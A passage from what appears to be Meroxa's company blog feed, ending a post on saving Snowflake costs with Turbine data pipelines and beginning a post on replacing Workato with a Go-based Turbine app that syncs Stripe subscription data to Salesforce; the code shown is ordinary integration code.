            records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Process Data&lt;/span&gt;
            filtered &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;filter&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Write to any Destination&lt;/span&gt;
            destination_db &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mySnowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination_db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;write&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;filtered&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;collection_archive&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# Snowflake, S3, Mongo, Redshift etc&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;file&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;sys&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;stderr&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Denormalize &lt;strong&gt;data to reduce compute costs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Spending less time and money on maintaining Snowflake can help you save money by making it easier to find important information faster. By denormalizing the data with Meroxa before loading it into Snowflake, more information is added that can be used to better understand and analyze the data. The denormalized data may have answers to certain questions or may be better organized and structured in a way that makes it easier to query.&lt;/p&gt;
&lt;p&gt;In Turbine (Javascript), a simple example of enriching and denormalize addresses in our records using a third-party API would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// Import any dependencies just like a regular application&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; googleMapsLookup&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; generateAddressObject &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./googleMapsApi.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;export&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;enrich&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;      
      &lt;span class=&quot;token comment&quot;&gt;// Call the Google Maps API and enrich the address on each record&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressLookupResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;googleMapsLookup&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressMetaData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;generateAddressObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;addressLookupResults&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address_metadata&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; addressMetaData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// Load and Read Tables from any source&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;myPostgreSQL&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// MySQL, Sql Server, Kafka, Mongo etc&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_shipping&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token comment&quot;&gt;// Process Data&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; enriched &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;enrich&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Write to any Destination&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mySnowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// Snowflake, S3, Mongo, Redshift etc&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;enriched&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;enriched_customer_shipping&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For a more detailed example on using API’s &amp;#x26; doing transformations in Turbine you can read our blog post &lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Reduce operational costs&lt;/h3&gt;
&lt;p&gt;Meroxa allows developers of any level to build data pipelines to ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know. This process typically requires Snowflake subject matter experts and can take months to deliver data projects. Meroxa allows anyone to be a snowflake expert and reduces the number of hours and resources needed to support Snowflake, ultimately delivering data projects faster.&lt;/p&gt;
&lt;p&gt;A typical workflow for a data project with Meroxa is cost-effective, enterprise-ready in days, allows for rapid prototypes &amp;#x26; conclusions, and offers code reusability:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Save%20on%20Snowflake%20Blog%20Post%20Image.png&quot; alt=&quot;Save on Snowflake Blog Post Image&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Meroxa Key Benefits&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Code First&lt;/strong&gt; - Developers can build data products in the language of their choice with the ultimate flexibility that code provides. Import packages, and modules to easily build with data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open-Source&lt;/strong&gt; - Built on open-source technology to give enterprises the security and flexibility they need. No vendor lock-in.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Easily manage hundreds of integrations&lt;/strong&gt; - Our innovative platform automatically creates a shared data stream catalog and embeds it into your workflows so you can search, find, and reuse data streams effortlessly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automatically connect, configure, and orchestrate data integrations&lt;/strong&gt; - Don’t stress over data orchestration: our platform has over a dozen pre-configured integrations for databases, cloud, SaaS apps, and streaming services…and we’re adding more on a regular basis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Scale dynamically with serverless architecture&lt;/strong&gt; - Build reusable and scalable components with standardized processes, allowing you to work efficiently while maximizing available resources.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Build, Test, Deploy&lt;/strong&gt; - it’s that simple. Build your stream processing application using a language of your choice, test with data we sample for you, and deploy your application.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Want to learn more about how Meroxa can help you realize more value in Snowflake? &lt;a href=&quot;https://meetings.hubspot.com/jamie-aliperti/website-schedule-a-demo&quot;&gt;Schedule a demo today&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Save Money on Workato and Gain Real-Time Data Streaming with Meroxa]]></title><description><![CDATA[Meroxa saved money by replacing Workato with a Turbine data app which allows you to quickly sync, persist, and transform data between data infrastructures.]]></description><link>https://meroxa.com/blog/save-money-on-workato-and-gain-real-time-data-streaming-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/save-money-on-workato-and-gain-real-time-data-streaming-with-meroxa</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Wed, 25 Jan 2023 20:11:23 GMT</pubDate><content:encoded>&lt;p&gt;In my last post I contrasted data apps with web apps, which was a fairly high-level discussion. This time around, I decided to get a little more hands on and show you how we’re using data apps at Meroxa to power Meroxa the business. The app I’m going to talk about is one we developed to simplify how we get account and subscription data to Salesforce so our sales and marketing teams could make use of it.&lt;/p&gt;
&lt;h1&gt;Where we started&lt;/h1&gt;
&lt;p&gt;Before we get into the app, let’s begin by talking about how we were getting data from our data warehouse to Salesforce. Prior to using our own platform we made use of Workato. Workato is a no-code solution that allows you to create “recipes” in their graphical editor. The recipe pulled data from our data warehouse, made a few API calls and then wrote data to our Salesforce instance. There wasn’t an option for real-time so we compromised and setup the recipe to execute hourly. The diagram below illustrates the setup.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Workato%20Blog_before-sfdc-sync_Image%201.png&quot; alt=&quot;Workato Blog_before-sfdc-sync_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;While this setup worked there were a few points of friction. The first was general lifecycle management of the recipes. The process for managing, testing and updating recipes was not great, especially for engineers who are used to version control and mature CI/CD pipelines. The second issue was that it was hard for new engineers to quickly understand what the recipe was doing. Understanding a recipe required navigating up and down levels in the Workato editor. We found ourselves wanting to just write code. With the introduction of Turbine, Meroxa’s data application framework that lets you quickly sync, persist, and transform data between data infrastructure, we saw this use case as a perfect candidate for replacement with a Turbine data app.&lt;/p&gt;
&lt;h1&gt;Where we are now&lt;/h1&gt;
&lt;p&gt;The diagram below shows a high-level view of our new setup. Instead of a Workato recipe we now have a real-time Turbine data app deployed on the Meroxa platform.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Workato%20Blog_after_image%202.png&quot; alt=&quot;Workato Blog_after_image 2&quot;&gt;&lt;/p&gt;
&lt;p&gt;By solving this issue using a Turbine data app we were able to gain several benefits. Instead of having to learn a specialized editor our developers are able to use their existing workflows. By bringing this solution into the realm of code any engineer on the team can improve and support it. Learning what the app does is now simply a matter of reading the code. Finally our data-app is real-time rather than being an hourly batch job.&lt;/p&gt;
&lt;h1&gt;How’d we do it?&lt;/h1&gt;
&lt;p&gt;While the picture above it nice, I’d like to get into the details of what’s actually involved.&lt;/p&gt;
&lt;p&gt;So what did we need to do to get all these benefits?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Register a Salesforce OAuth App&lt;/li&gt;
&lt;li&gt;Write a Turbine data app to replace the recipe.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;The Salesforce App&lt;/h2&gt;
&lt;p&gt;Our first step was using the Salesforce Admin Console to create an app that we could use to interact with their API. I won’t go into detail on creating a connected app, you can find Salesforce’s documentation &lt;a href=&quot;https://help.salesforce.com/s/articleView?id=sf.connected_app_overview.htm&amp;#x26;type=5&quot;&gt;here&lt;/a&gt;. Once the Salesforce app was set up and we had our &lt;code class=&quot;language-text&quot;&gt;client_id&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;client_secret&lt;/code&gt; it was time to actually write our Turbine App.&lt;/p&gt;
&lt;h2&gt;Writing our Turbine App&lt;/h2&gt;
&lt;p&gt;The main tasks our Turbine app needed to accomplish was taking the event data supplementing it with info from Stripe and transforming it into the proper format for Salesforce. Let’s see how we were able to accomplish that with a minimal amount of code.&lt;/p&gt;
&lt;p&gt;Here we’re using Stripe’s Go client library to fetch subscription information. What’s great about this code is that nothing about it is Turbine specific. Turbine apps can easily use internal libraries and share code with existing applications, reducing duplication and easing development.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/stripe/stripe-go/v72&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/stripe/stripe-go/v72/sub&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;translateStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subStatus stripe&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;SubscriptionStatus&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; subStatus &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;past_due&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Past Due&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subStatus&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bsf BasicStripeFetcher&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;fetchSubscriptionStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subID &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	stripe&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Key &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; bsf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;apiKey

	subscription&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; sub&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subID&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	status &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;translateStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subscription&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Status&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; status&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The code below shows how we send data to the Salesforce API. Once again nothing Turbine specific here, we’re simple manipulating data and calling an API.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;errors&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;fmt&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;log&quot;&lt;/span&gt;

	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/simpleforce/simpleforce&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; ProductData &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	accountId            &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	email                &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	givenName            &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	familyName           &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	planName             &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	stripeSubscriptionId &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	subscriptionStatus   &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
	accountCreatedAt     &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; SalesforceUpdater &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;updateProductInstance&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data ProductData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; BasicSalesforceUpdater &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	client &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;simpleforce&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Client
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;//&amp;lt;SNIP&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bsu BasicSalesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;query&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data ProductData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	q &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprintf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;SELECT FIELDS(ALL) FROM Product_Instance__c WHERE Workspace_Id__c = &apos;%s&apos; LIMIT 1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;accountId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	result&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bsu&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Query&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;q&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
